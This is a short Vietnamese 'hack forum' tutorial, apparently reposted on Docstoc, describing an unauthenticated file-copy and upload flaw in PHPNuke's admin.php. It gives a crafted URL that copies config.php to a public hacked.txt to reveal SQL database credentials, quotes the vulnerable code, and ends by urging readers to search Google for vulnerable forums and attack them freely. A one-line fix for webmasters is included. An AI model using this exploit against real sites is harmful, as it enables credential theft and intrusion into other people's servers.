Docstoc

Hướng dẫn Hack Forum (DOC)

Document Sample
Hướng dẫn Hack Forum (DOC) Powered By Docstoc
					Hướng dẫn Hack Forum : Đây là một lỗi thực sự nguy hiểm, nó cho phép bạn có thể copy bất cứ file nào trên Web site thậm chí upload file từ máy của mình. Các phiên bản bị lỗi : Tất cả các phiên bản trừ PHPNuke 5.0 RC1. Ứng dụng : Nếu bạn cần biết mật mã SQL http://www.server.net/admin.php?upl..._name=hacked.tx t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt Bạn sẽ nhận được 1 form yêu cầu đăng nhập, bỏ qua nó và hãy đi đến http://www.server.net/images/hacked.txt, bạn sẽ thấy nội dung của file config.php mà ai cũng biết rằng trong đó có chứa mật mã để truy nhập SQL server. Bạn thậm chí còn có thể upload file nếu muốn.... có nhiều cách khác nữa để sử dụng lỗi này. Nguyên nhân : File admin.php có chứa đoạn mã sau:

$basedir = dirname($SCRIPT_FILENAME); $textrows = 20; $textcols = 85; $udir = dirname($PHP_SELF); if(!$wdir) $wdir="/"; if($cancel) $op="FileManager"; if($upload) { copy($userfile,$basedir.$wdir.$userfile_name); $lastaction = ""._UPLOADED." $userfile_name --> $wdir"; // This need a rewrite ---> OMG! //include("header.php"); //GraphicAdmin($hlpfile); //html_header(); //displaydir(); $wdir2="/"; chdir($basedir . $wdir2); //CloseTable(); //include("footer.php"); Header("Location: admin.php?op=FileManager"); exit; } Đoạn mã này không kiểm tra xem bạn đã đăng nhập với tư cách admin hay chưa, bởi vậy bạn có thể sử dụng nó. Giải pháp cho các Webmaster : Hãy xoá đoạn mã nói trên và bạn sẽ được an toàn. Chỉ dùng FTP để upload file. p/s : Cac ban vao http://www.goole.com/ de tim cac Forum dang nay ! Nhieu lam ! Nghich thoai mai ! he he =================bà con tự nghiên cuu co gì thi tui nói thêm http://clubhacker.hit.as byeeeeeee